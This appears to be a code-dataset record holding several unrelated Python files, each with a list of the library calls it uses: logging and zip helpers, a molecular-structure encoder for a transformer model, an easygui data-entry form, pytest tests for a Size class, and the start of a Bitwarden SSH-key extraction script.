                    config = json.load(configfile)
                logging.config.dictConfig(config)
            else:
                logging.config.fileConfig(config_info)
        else:
            # Not a file on disk: treat the argument itself as a JSON string.
            # BUG FIX: json.loads, not json.load (which expects a file object).
            config = json.loads(config_info)
            logging.config.dictConfig(config)
        if temp_path:
            os.remove(temp_path)
    else:
        logging.basicConfig(format='%(asctime)-15s [%(threadName)-15s] %(levelname)-7s :'
                                   ' %(name)s - %(message)s',
                            level=logging.INFO)
    logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARN)
def extract_zip_contents(zipfilepath):
    """Extract a zip archive and return the paths of the extracted files.

    The archive is unpacked into a sibling folder named after the zipfile
    (with the ".zip" suffix stripped), and the path of every extracted file
    is returned.

    Keyword arguments:
    zipfilepath -- path of zipfile to extract
    """
    output_folder = zipfilepath.replace(".zip", "")
    # FIX: context manager guarantees the archive handle is closed; the
    # original leaked the open ZipFile object.
    with zipfile.ZipFile(zipfilepath) as zipobj:
        zipobj.extractall(output_folder)
    file_list = []
    for root, _, files in os.walk(output_folder):
        for currfile in files:
            file_list.append(os.path.join(root, currfile))
    return file_list
| [
"logging.basicConfig",
"logging.getLogger",
"os.fdopen",
"zipfile.ZipFile",
"logging.config.dictConfig",
"os.path.join",
"requests.get",
"os.path.isfile",
"datetime.datetime.now",
"yaml.safe_load",
"logging.config.fileConfig",
"json.load",
"tempfile.mkstemp",
"os.walk",
"os.remove"
] | [((3926, 3954), 'zipfile.ZipFile', 'zipfile.ZipFile', (['zipfilepath'], {}), '(zipfilepath)\n', (3941, 3954), False, 'import zipfile\n'), ((4090, 4112), 'os.walk', 'os.walk', (['output_folder'], {}), '(output_folder)\n', (4097, 4112), False, 'import os\n'), ((2723, 2750), 'os.path.isfile', 'os.path.isfile', (['config_info'], {}), '(config_info)\n', (2737, 2750), False, 'import os\n'), ((3429, 3564), 'logging.basicConfig', 'logging.basicConfig', ([], {'format': '"""%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s"""', 'level': 'logging.INFO'}), "(format=\n '%(asctime)-15s [%(threadName)-15s] %(levelname)-7s : %(name)s - %(message)s'\n , level=logging.INFO)\n", (3448, 3564), False, 'import logging\n'), ((1521, 1544), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (1542, 1544), False, 'import datetime\n'), ((2411, 2436), 'requests.get', 'requests.get', (['config_info'], {}), '(config_info)\n', (2423, 2436), False, 'import requests\n'), ((2506, 2524), 'tempfile.mkstemp', 'tempfile.mkstemp', ([], {}), '()\n', (2522, 2524), False, 'import tempfile\n'), ((3286, 3308), 'json.load', 'json.load', (['config_info'], {}), '(config_info)\n', (3295, 3308), False, 'import json\n'), ((3321, 3354), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (3346, 3354), False, 'import logging\n'), ((3390, 3410), 'os.remove', 'os.remove', (['temp_file'], {}), '(temp_file)\n', (3399, 3410), False, 'import os\n'), ((2542, 2567), 'os.fdopen', 'os.fdopen', (['temp_file', '"""w"""'], {}), "(temp_file, 'w')\n", (2551, 2567), False, 'import os\n'), ((3629, 3690), 'logging.getLogger', 'logging.getLogger', (['"""requests.packages.urllib3.connectionpool"""'], {}), "('requests.packages.urllib3.connectionpool')\n", (3646, 3690), False, 'import logging\n'), ((4174, 4202), 'os.path.join', 'os.path.join', (['root', 'currfile'], {}), '(root, currfile)\n', (4186, 4202), False, 'import os\n'), ((2885, 2911), 
'yaml.safe_load', 'yaml.safe_load', (['configfile'], {}), '(configfile)\n', (2899, 2911), False, 'import yaml\n'), ((2932, 2965), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (2957, 2965), False, 'import logging\n'), ((3212, 3250), 'logging.config.fileConfig', 'logging.config.fileConfig', (['config_info'], {}), '(config_info)\n', (3237, 3250), False, 'import logging\n'), ((3102, 3123), 'json.load', 'json.load', (['configfile'], {}), '(configfile)\n', (3111, 3123), False, 'import json\n'), ((3144, 3177), 'logging.config.dictConfig', 'logging.config.dictConfig', (['config'], {}), '(config)\n', (3169, 3177), False, 'import logging\n')] |
from typing import Dict, List, Optional, Union
import numpy as np
import torch
# Periodic-table element symbols in atomic-number order (H=1 .. Og=118);
# an element's position in this list therefore encodes its atomic number.
MOLECULAR_ATOMS = (
    "H,He,Li,Be,B,C,N,O,F,Ne,Na,Mg,Al,Si,P,S,Cl,Ar,K,Ca,Sc,Ti,V,Cr,Mn,Fe,Co,Ni,Cu,Zn,"
    "Ga,Ge,As,Se,Br,Kr,Rb,Sr,Y,Zr,Nb,Mo,Tc,Ru,Rh,Pd,Ag,Cd,In,Sn,Sb,Te,I,Xe,Cs,Ba,La,Ce,"
    "Pr,Nd,Pm,Sm,Eu,Gd,Tb,Dy,Ho,Er,Tm,Yb,Lu,Hf,Ta,W,Re,Os,Ir,Pt,Au,Hg,Tl,Pb,Bi,Po,At,"
    "Rn,Fr,Ra,Ac,Th,Pa,U,Np,Pu,Am,Cm,Bk,Cf,Es,Fm,Md,No,Lr,Rf,Db,Sg,Bh,Hs,Mt,Ds,Rg,Cn,"
    "Nh,Fl,Mc,Lv,Ts,Og"
).split(",")
# Formal-charge vocabulary: integer charges -15..15 plus three marker tokens
# (":", "^", "^^").  NOTE(review): presumably lone-pair/radical annotations
# -- confirm against the dataset specification.
MOLECULAR_CHARGES = list(range(-15, 16)) + [":", "^", "^^"]
# Bond-type ids (1..8) used as relative attention types in the MoT model.
MOLECULAR_BOND_TYPES = [1, 2, 3, 4, 5, 6, 7, 8]
class MolecularEncoder:
    """Molecular structure encoder class.
    This class is a kind of tokenizers for MoT model. Every transformer models have
    their own subword tokenizers (and it even creates attention masks), and of course
    MoT needs its own input encoder. While 3D-molecular structure data is not as simple
    as sentences which are used in common transformer model, we create new input encoder
    which creates input encodings from the 3D-molecular structure data. Using this, you
    can simply encode the structure data and pass to the MoT model.
    Args:
        cls_token: The name of classification token. Default is `[CLS]`.
        pad_token: The name of padding token. Default is `[PAD]`.
    """
    # This field is a part of MoT configurations. If you are using MoT model with this
    # encoder class, then you can simply define the number of embeddings and attention
    # types using this field. The vocabularies are predefined, so you do not need to
    # handle the vocabulary sizes.
    mot_config = dict(
        num_embeddings=[len(MOLECULAR_ATOMS) + 2, len(MOLECULAR_CHARGES) + 2],
        num_attention_types=len(MOLECULAR_BOND_TYPES) + 2,
    )
    def __init__(
        self,
        cls_token: str = "[CLS]",
        pad_token: str = "[PAD]",
    ):
        # In every vocabulary index 0 is the padding token and index 1 the
        # classification token; the "+ 2" in `mot_config` accounts for them.
        # vocab1: atom symbols, vocab2: formal charges, vocab3: bond types.
        self.vocab1 = [pad_token, cls_token] + MOLECULAR_ATOMS
        self.vocab2 = [pad_token, cls_token] + MOLECULAR_CHARGES
        self.vocab3 = [pad_token, cls_token] + MOLECULAR_BOND_TYPES
        self.cls_token = cls_token
        self.pad_token = pad_token
    def collect_input_sequences(self, molecular: Dict[str, List]) -> Dict[str, List]:
        """Collect input sequences from the molecular structure data.
        Args:
            molecular: The molecular data which contains 3D atoms and their bonding
                informations.
        Returns:
            A dictionary which contains the input tokens and 3d positions of the atoms.
        """
        # Sequence position 0 is the [CLS] token (placed at the origin).
        input_ids = [
            [self.vocab1.index(self.cls_token)],
            [self.vocab2.index(self.cls_token)],
        ]
        position_ids = [[0.0, 0.0, 0.0]]
        attention_mask = [1] * (len(molecular["atoms"]) + 1)
        # Each atom entry is indexed as atom[:3] -> (x, y, z) coordinates,
        # atom[3] -> element symbol, atom[4] -> formal charge.
        for atom in molecular["atoms"]:
            input_ids[0].append(self.vocab1.index(atom[3]))
            input_ids[1].append(self.vocab2.index(atom[4]))
            position_ids.append(atom[:3])
        return {
            "input_ids": input_ids,
            "position_ids": position_ids,
            "attention_mask": attention_mask,
        }
    def create_attention_type_ids(self, molecular: Dict) -> np.ndarray:
        """Create an attention types from the molecular structure data.
        MoT supports attention types which are applied to the attention scores
        relatively. Using this, you can give attention weights (bond types) directly to
        the self-attention module. This method creates the attention type array by using
        the bond informations in the molecular structure.
        Args:
            molecular: The molecular data which contains 3D atoms and their bonding
                informations.
        Returns:
            The attention type array from the bond informations.
        """
        max_seq_len = len(molecular["atoms"]) + 1
        # Unbonded atom pairs default to the padding type; row/column 0
        # corresponds to the [CLS] token.
        attention_type_ids = np.empty((max_seq_len, max_seq_len), dtype=np.int64)
        attention_type_ids.fill(self.vocab3.index(self.pad_token))
        attention_type_ids[0, :] = self.vocab3.index(self.cls_token)
        attention_type_ids[:, 0] = self.vocab3.index(self.cls_token)
        # Bonds are undirected, so the matrix is filled symmetrically; the
        # "+ 1" offsets account for the [CLS] token at position 0.
        for first, second, bond_type in molecular["bonds"]:
            attention_type_ids[first + 1, second + 1] = self.vocab3.index(bond_type)
            attention_type_ids[second + 1, first + 1] = self.vocab3.index(bond_type)
        return attention_type_ids
    def encode(self, molecular: Dict[str, List]) -> Dict[str, Union[List, np.ndarray]]:
        """Encode the molecular structure data to the model inputs.
        Args:
            molecular: The molecular data which contains 3D atoms and their bonding
                informations.
        Returns:
            An encoded output which contains input ids, 3d positions, position mask, and
            attention types.
        """
        return {
            **self.collect_input_sequences(molecular),
            "attention_type_ids": self.create_attention_type_ids(molecular),
        }
    def collate(
        self,
        encodings: List[Dict[str, Union[List, np.ndarray]]],
        max_length: Optional[int] = None,
        pad_to_multiple_of: Optional[int] = None,
    ) -> Dict[str, Union[List, np.ndarray, torch.Tensor]]:
        """Collate the encodings of which lengths are different to each other.
        The lengths of encoded molecular structure data are not exactly same. To group
        the sequences into the batch requires equal lengths. To resolve the problem,
        this class supports sequence and attention mask paddings. Using this, you can
        pad the encodings to desired lengths or match to the longest sequences. In
        addition, this method automatically converts the sequences to torch tensors.
        Args:
            encodings: The batch of encodings.
            max_length: The desired maximum length of sequences. Default is `None`.
            pad_to_multiple_of: To match the sequence length to be multiple of certain
                factor. Default is `None`.
        Returns:
            The collated batched encodings which contain converted tensors.
        """
        # The target length never exceeds the longest sequence in the batch;
        # `max_length` only caps it.  NOTE: the encodings are modified in place.
        longest_length = max(len(enc["input_ids"][0]) for enc in encodings)
        max_length = min(max_length or longest_length, longest_length)
        if pad_to_multiple_of is not None:
            # Round the target length up to the nearest multiple.
            max_length = max_length + pad_to_multiple_of - 1
            max_length = max_length // pad_to_multiple_of * pad_to_multiple_of
        padding_id_1 = self.vocab1.index(self.pad_token)
        padding_id_2 = self.vocab2.index(self.pad_token)
        for enc in encodings:
            num_paddings = max_length - len(enc["input_ids"][0])
            if num_paddings >= 0:
                enc["input_ids"][0] += [padding_id_1] * num_paddings
                enc["input_ids"][1] += [padding_id_2] * num_paddings
                enc["position_ids"] += [[0.0, 0.0, 0.0]] * num_paddings
                enc["attention_mask"] += [0] * num_paddings
                # The square attention-type matrix is padded on both axes.
                enc["attention_type_ids"] = np.pad(
                    enc["attention_type_ids"],
                    pad_width=((0, num_paddings), (0, num_paddings)),
                    constant_values=self.vocab3.index(self.pad_token),
                )
            else:
                # If the encoded sequences are longer than the maximum length, then
                # truncate the sequences and attention mask.
                enc["input_ids"][0] = enc["input_ids"][0][:max_length]
                enc["input_ids"][1] = enc["input_ids"][1][:max_length]
                enc["position_ids"] = enc["position_ids"][:max_length]
                enc["attention_mask"] = enc["attention_mask"][:max_length]
                enc["attention_type_ids"] = enc["attention_type_ids"][
                    :max_length, :max_length
                ]
        # Collect all sequences into their batch and convert them to torch tensor. After
        # that, you can use the sequences to the model because all inputs are converted
        # to the tensors. Since we use two `input_ids` and handle them on the list, they
        # will be converted individually.
        encodings = {k: [enc[k] for enc in encodings] for k in encodings[0]}
        encodings["input_ids"] = [
            torch.tensor([x[0] for x in encodings["input_ids"]]),
            torch.tensor([x[1] for x in encodings["input_ids"]]),
        ]
        encodings["position_ids"] = torch.tensor(encodings["position_ids"])
        encodings["attention_mask"] = torch.tensor(encodings["attention_mask"])
        encodings["attention_type_ids"] = torch.tensor(encodings["attention_type_ids"])
        if "labels" in encodings:
            encodings["labels"] = torch.tensor(encodings["labels"])
        return encodings
| [
"torch.tensor",
"numpy.empty"
] | [((3918, 3970), 'numpy.empty', 'np.empty', (['(max_seq_len, max_seq_len)'], {'dtype': 'np.int64'}), '((max_seq_len, max_seq_len), dtype=np.int64)\n', (3926, 3970), True, 'import numpy as np\n'), ((8457, 8496), 'torch.tensor', 'torch.tensor', (["encodings['position_ids']"], {}), "(encodings['position_ids'])\n", (8469, 8496), False, 'import torch\n'), ((8535, 8576), 'torch.tensor', 'torch.tensor', (["encodings['attention_mask']"], {}), "(encodings['attention_mask'])\n", (8547, 8576), False, 'import torch\n'), ((8619, 8664), 'torch.tensor', 'torch.tensor', (["encodings['attention_type_ids']"], {}), "(encodings['attention_type_ids'])\n", (8631, 8664), False, 'import torch\n'), ((8291, 8343), 'torch.tensor', 'torch.tensor', (["[x[0] for x in encodings['input_ids']]"], {}), "([x[0] for x in encodings['input_ids']])\n", (8303, 8343), False, 'import torch\n'), ((8357, 8409), 'torch.tensor', 'torch.tensor', (["[x[1] for x in encodings['input_ids']]"], {}), "([x[1] for x in encodings['input_ids']])\n", (8369, 8409), False, 'import torch\n'), ((8734, 8767), 'torch.tensor', 'torch.tensor', (["encodings['labels']"], {}), "(encodings['labels'])\n", (8746, 8767), False, 'import torch\n')] |
import easygui
# TODO: In next version use easygui.multenterbox instead of independent enterbox
class Service:
    """Collects all service-visit verification inputs from the user through a
    fixed sequence of easygui dialog boxes, one attribute per question.
    """

    def __init__(self):
        # Every dialog shares the same window title; hoist it (and the two
        # most-used dialog functions) so each prompt reads as one line.
        title = "Service Visit Inputs"
        ask = easygui.enterbox
        confirm = easygui.boolbox
        self.employerName = ask(msg="Enter Name of Employer", title=title)
        self.employerAddr = ask(msg="Enter Address of Employer", title=title)
        self.dateOfJoining = ask(msg="Enter Date of Joining (dd/mm/yyyy)", title=title)
        self.dateOfCnfrmtn = ask(msg="Enter Date of Confirmation (dd/mm/yyyy)", title=title)
        self.phnNo = ask(msg="Enter Mobile Phone Number", title=title)
        self.telNo = ask(msg="Enter Telephone Number", title=title)
        self.desig = ask(msg="Enter Designation of Applicant", title=title)
        self.nameVerif = confirm(msg="Was Name of Applicant Verified on Visit?", title=title)
        self.addrVerif = confirm(msg="Was Address of Applicant's Office Verified on Visit?", title=title)
        self.desigVerif = confirm(msg="Was Designation of Applicant Verified on Visit?", title=title)
        self.dateofVisit = ask(msg="Enter Date of Visit (dd/mm/yyyy)", title=title)
        self.timeofVisit = ask(msg="Enter Time of Visit", title=title)
        self.personContacted = ask(msg="Enter Name of Person Contacted", title=title)
        self.contactedDesig = ask(msg="Designation of Contacted Person", title=title)
        self.mobileNo = ask(msg="Enter Mobile Number of Contacted Person", title=title)
        self.yrsBusiness = ask(msg="Number of Years in Present Employment", title=title)
        self.visitingCard = confirm(msg="Was visiting Card of Contacted Person Obtained?", title=title)
        self.busiNature = ask(msg="Enter Nature of Business", title=title)
        self.applJob = easygui.choicebox(
            msg="Select Type of Job of Applicant?", title=title,
            choices=["Permanent", "Probation", "Contract Worker", "Temporary Worker", "Others"])
        self.applWorkingAs = easygui.choicebox(
            msg="Applicant is working in Organisation as:-", title=title,
            choices=["Typist", "Stenographer", "Supervisor", "Junior Management",
                     "Middle Management", "Senior Management", "Other Management"])
        self.tranferable = confirm(msg="Is Applicant's Job transferable or not?", title=title)
        self.salaryVerifierName = ask(
            msg="Enter Name of Person who verified Salary Details of Applicant", title=title)
        # The salary-verifier designation dialog deliberately has no title.
        self.salaryVerifierDesig = ask(
            msg="Enter Designation of Person who verified Salary Details of Applicant", title="")
        self.boolRecom = confirm(msg="Select one of following", title=title,
                                 choices=["Recommended", "Not Recommended"])
        self.remarks = ask(msg="Enter Any Other Remarks", title=title)
| [
"easygui.enterbox",
"easygui.choicebox",
"easygui.boolbox"
] | [((167, 243), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Employer"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Name of Employer', title='Service Visit Inputs')\n", (183, 243), False, 'import easygui\n'), ((272, 351), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Address of Employer"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Address of Employer', title='Service Visit Inputs')\n", (288, 351), False, 'import easygui\n'), ((381, 474), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Joining (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Joining (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (397, 474), False, 'import easygui\n'), ((499, 597), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Confirmation (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Confirmation (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (515, 597), False, 'import easygui\n'), ((660, 739), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Mobile Phone Number"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Mobile Phone Number', title='Service Visit Inputs')\n", (676, 739), False, 'import easygui\n'), ((761, 837), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Telephone Number"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Telephone Number', title='Service Visit Inputs')\n", (777, 837), False, 'import easygui\n'), ((859, 948), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Designation of Applicant"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Designation of Applicant', title=\n 'Service Visit Inputs')\n", (875, 948), False, 'import easygui\n'), ((969, 1067), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Name of Applicant Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was Name of Applicant 
Verified on Visit?', title=\n 'Service Visit Inputs')\n", (984, 1067), False, 'import easygui\n'), ((1129, 1238), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Address of Applicant\'s Office Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), '(msg="Was Address of Applicant\'s Office Verified on Visit?",\n title=\'Service Visit Inputs\')\n', (1144, 1238), False, 'import easygui\n'), ((1302, 1406), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was Designation of Applicant Verified on Visit?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was Designation of Applicant Verified on Visit?',\n title='Service Visit Inputs')\n", (1317, 1406), False, 'import easygui\n'), ((1472, 1563), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Date of Visit (dd/mm/yyyy)"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Date of Visit (dd/mm/yyyy)', title=\n 'Service Visit Inputs')\n", (1488, 1563), False, 'import easygui\n'), ((1586, 1659), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Time of Visit"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Time of Visit', title='Service Visit Inputs')\n", (1602, 1659), False, 'import easygui\n'), ((1691, 1780), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Person Contacted"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Name of Person Contacted', title=\n 'Service Visit Inputs')\n", (1707, 1780), False, 'import easygui\n'), ((1806, 1896), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Designation of Contacted Person"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Designation of Contacted Person', title=\n 'Service Visit Inputs')\n", (1822, 1896), False, 'import easygui\n'), ((1916, 2014), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Mobile Number of Contacted Person"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Mobile Number of Contacted Person', title=\n 'Service Visit 
Inputs')\n", (1932, 2014), False, 'import easygui\n'), ((2037, 2133), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Number of Years in Present Employment"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Number of Years in Present Employment', title=\n 'Service Visit Inputs')\n", (2053, 2133), False, 'import easygui\n'), ((2157, 2261), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Was visiting Card of Contacted Person Obtained?"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Was visiting Card of Contacted Person Obtained?',\n title='Service Visit Inputs')\n", (2172, 2261), False, 'import easygui\n'), ((2328, 2406), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Nature of Business"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Nature of Business', title='Service Visit Inputs')\n", (2344, 2406), False, 'import easygui\n'), ((2430, 2611), 'easygui.choicebox', 'easygui.choicebox', ([], {'msg': '"""Select Type of Job of Applicant?"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Permanent', 'Probation', 'Contract Worker', 'Temporary Worker', 'Others']"}), "(msg='Select Type of Job of Applicant?', title=\n 'Service Visit Inputs', choices=['Permanent', 'Probation',\n 'Contract Worker', 'Temporary Worker', 'Others'])\n", (2447, 2611), False, 'import easygui\n'), ((2723, 2965), 'easygui.choicebox', 'easygui.choicebox', ([], {'msg': '"""Applicant is working in Organisation as:-"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Typist', 'Stenographer', 'Supervisor', 'Junior Management',\n 'Middle Management', 'Senior Management', 'Other Management']"}), "(msg='Applicant is working in Organisation as:-', title=\n 'Service Visit Inputs', choices=['Typist', 'Stenographer', 'Supervisor',\n 'Junior Management', 'Middle Management', 'Senior Management',\n 'Other Management'])\n", (2740, 2965), False, 'import easygui\n'), ((3130, 3227), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Is Applicant\'s Job 
transferable or not?"""', 'title': '"""Service Visit Inputs"""'}), '(msg="Is Applicant\'s Job transferable or not?", title=\n \'Service Visit Inputs\')\n', (3145, 3227), False, 'import easygui\n'), ((3257, 3382), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Name of Person who verified Salary Details of Applicant"""', 'title': '"""Service Visit Inputs"""'}), "(msg=\n 'Enter Name of Person who verified Salary Details of Applicant', title=\n 'Service Visit Inputs')\n", (3273, 3382), False, 'import easygui\n'), ((3459, 3570), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Designation of Person who verified Salary Details of Applicant"""', 'title': '""""""'}), "(msg=\n 'Enter Designation of Person who verified Salary Details of Applicant',\n title='')\n", (3475, 3570), False, 'import easygui\n'), ((3646, 3770), 'easygui.boolbox', 'easygui.boolbox', ([], {'msg': '"""Select one of following"""', 'title': '"""Service Visit Inputs"""', 'choices': "['Recommended', 'Not Recommended']"}), "(msg='Select one of following', title='Service Visit Inputs',\n choices=['Recommended', 'Not Recommended'])\n", (3661, 3770), False, 'import easygui\n'), ((3831, 3908), 'easygui.enterbox', 'easygui.enterbox', ([], {'msg': '"""Enter Any Other Remarks"""', 'title': '"""Service Visit Inputs"""'}), "(msg='Enter Any Other Remarks', title='Service Visit Inputs')\n", (3847, 3908), False, 'import easygui\n')] |
import pytest
from ncoreparser.util import Size
class TestSize:
@pytest.mark.parametrize("size1, size2", [("1024 MiB", "1 GiB"),
("10 MiB", "10 MiB"),
("2048 KiB", "2 MiB")])
def test_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 == s2
@pytest.mark.parametrize("size1, size2", [("1023 MiB", "1 GiB"),
("10 MiB", "11 MiB"),
("2049 KiB", "2 MiB")])
def test_not_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 != s2
@pytest.mark.parametrize("size1, size2", [("1025 MiB", "1 GiB"),
("11 MiB", "10 MiB"),
("2049 KiB", "2 MiB")])
def test_greater_than(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 > s2
@pytest.mark.parametrize("size1, size2", [("1025 MiB", "1 GiB"),
("10 MiB", "10 MiB"),
("2049 KiB", "2 MiB"),
("2048 KiB", "2 MiB")])
def test_greater_equal(self, size1, size2):
s1 = Size(size1)
s2 = Size(size2)
assert s1 >= s2
@pytest.mark.parametrize("size1, size2, expected", [("1024 MiB", "1 GiB", "2.00 GiB"),
("10 MiB", "11 MiB", "21.00 MiB"),
("2048 KiB", "2 MiB", "4.00 MiB")])
def test_add(self, size1, size2, expected):
s = Size(size1) + Size(size2)
assert str(s) == expected
s = Size(size1)
s += Size(size2)
assert str(s) == expected
| [
"ncoreparser.util.Size",
"pytest.mark.parametrize"
] | [((71, 184), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1024 MiB', '1 GiB'), ('10 MiB', '10 MiB'), ('2048 KiB', '2 MiB')]"], {}), "('size1, size2', [('1024 MiB', '1 GiB'), ('10 MiB',\n '10 MiB'), ('2048 KiB', '2 MiB')])\n", (94, 184), False, 'import pytest\n'), ((393, 506), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1023 MiB', '1 GiB'), ('10 MiB', '11 MiB'), ('2049 KiB', '2 MiB')]"], {}), "('size1, size2', [('1023 MiB', '1 GiB'), ('10 MiB',\n '11 MiB'), ('2049 KiB', '2 MiB')])\n", (416, 506), False, 'import pytest\n'), ((719, 832), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1025 MiB', '1 GiB'), ('11 MiB', '10 MiB'), ('2049 KiB', '2 MiB')]"], {}), "('size1, size2', [('1025 MiB', '1 GiB'), ('11 MiB',\n '10 MiB'), ('2049 KiB', '2 MiB')])\n", (742, 832), False, 'import pytest\n'), ((1047, 1183), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2"""', "[('1025 MiB', '1 GiB'), ('10 MiB', '10 MiB'), ('2049 KiB', '2 MiB'), (\n '2048 KiB', '2 MiB')]"], {}), "('size1, size2', [('1025 MiB', '1 GiB'), ('10 MiB',\n '10 MiB'), ('2049 KiB', '2 MiB'), ('2048 KiB', '2 MiB')])\n", (1070, 1183), False, 'import pytest\n'), ((1446, 1610), 'pytest.mark.parametrize', 'pytest.mark.parametrize', (['"""size1, size2, expected"""', "[('1024 MiB', '1 GiB', '2.00 GiB'), ('10 MiB', '11 MiB', '21.00 MiB'), (\n '2048 KiB', '2 MiB', '4.00 MiB')]"], {}), "('size1, size2, expected', [('1024 MiB', '1 GiB',\n '2.00 GiB'), ('10 MiB', '11 MiB', '21.00 MiB'), ('2048 KiB', '2 MiB',\n '4.00 MiB')])\n", (1469, 1610), False, 'import pytest\n'), ((326, 337), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (330, 337), False, 'from ncoreparser.util import Size\n'), ((351, 362), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (355, 362), False, 'from ncoreparser.util import Size\n'), ((652, 663), 'ncoreparser.util.Size', 'Size', (['size1'], 
{}), '(size1)\n', (656, 663), False, 'from ncoreparser.util import Size\n'), ((677, 688), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (681, 688), False, 'from ncoreparser.util import Size\n'), ((981, 992), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (985, 992), False, 'from ncoreparser.util import Size\n'), ((1006, 1017), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1010, 1017), False, 'from ncoreparser.util import Size\n'), ((1379, 1390), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1383, 1390), False, 'from ncoreparser.util import Size\n'), ((1404, 1415), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1408, 1415), False, 'from ncoreparser.util import Size\n'), ((1847, 1858), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1851, 1858), False, 'from ncoreparser.util import Size\n'), ((1872, 1883), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1876, 1883), False, 'from ncoreparser.util import Size\n'), ((1775, 1786), 'ncoreparser.util.Size', 'Size', (['size1'], {}), '(size1)\n', (1779, 1786), False, 'from ncoreparser.util import Size\n'), ((1789, 1800), 'ncoreparser.util.Size', 'Size', (['size2'], {}), '(size2)\n', (1793, 1800), False, 'from ncoreparser.util import Size\n')] |
#!/usr/bin/env python3
"""
Extracts SSH keys from Bitwarden vault
"""
import argparse
import json
import logging
import os
import subprocess
import pexpect
import time
from pkg_resources import parse_version
def memoize(func):
"""
Decorator function to cache the results of another function call
"""
cache = dict()
def memoized_func(*args):
if args in cache:
return cache[args]
result = func(*args)
cache[args] = result
return result
return memoized_func
@memoize
def bwcli_version():
"""
Function to return the version of the Bitwarden CLI
"""
proc_version = subprocess.run(
['bw', '--version'],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_version.stdout
@memoize
def cli_supports(feature):
"""
Function to return whether the current Bitwarden CLI supports a particular
feature
"""
version = parse_version(bwcli_version())
if feature == 'nointeraction' and version >= parse_version('1.9.0'):
return True
return False
def get_session():
"""
Function to return a valid Bitwarden session
"""
# Check for an existing, user-supplied Bitwarden session
session = os.environ.get('BW_SESSION')
if session is not None:
logging.debug('Existing Bitwarden session found')
return session
# Check if we're already logged in
proc_logged = subprocess.run(['bw', 'login', '--check', '--quiet'])
if proc_logged.returncode:
logging.debug('Not logged into Bitwarden')
operation = 'login'
else:
logging.debug('Bitwarden vault is locked')
operation = 'unlock'
proc_session = subprocess.run(
['bw', '--raw', operation],
stdout=subprocess.PIPE,
universal_newlines=True,
check=True,
)
return proc_session.stdout
def get_folders(session, foldername):
"""
Function to return the ID of the folder that matches the provided name
"""
logging.debug('Folder name: %s', foldername)
proc_folders = subprocess.run(
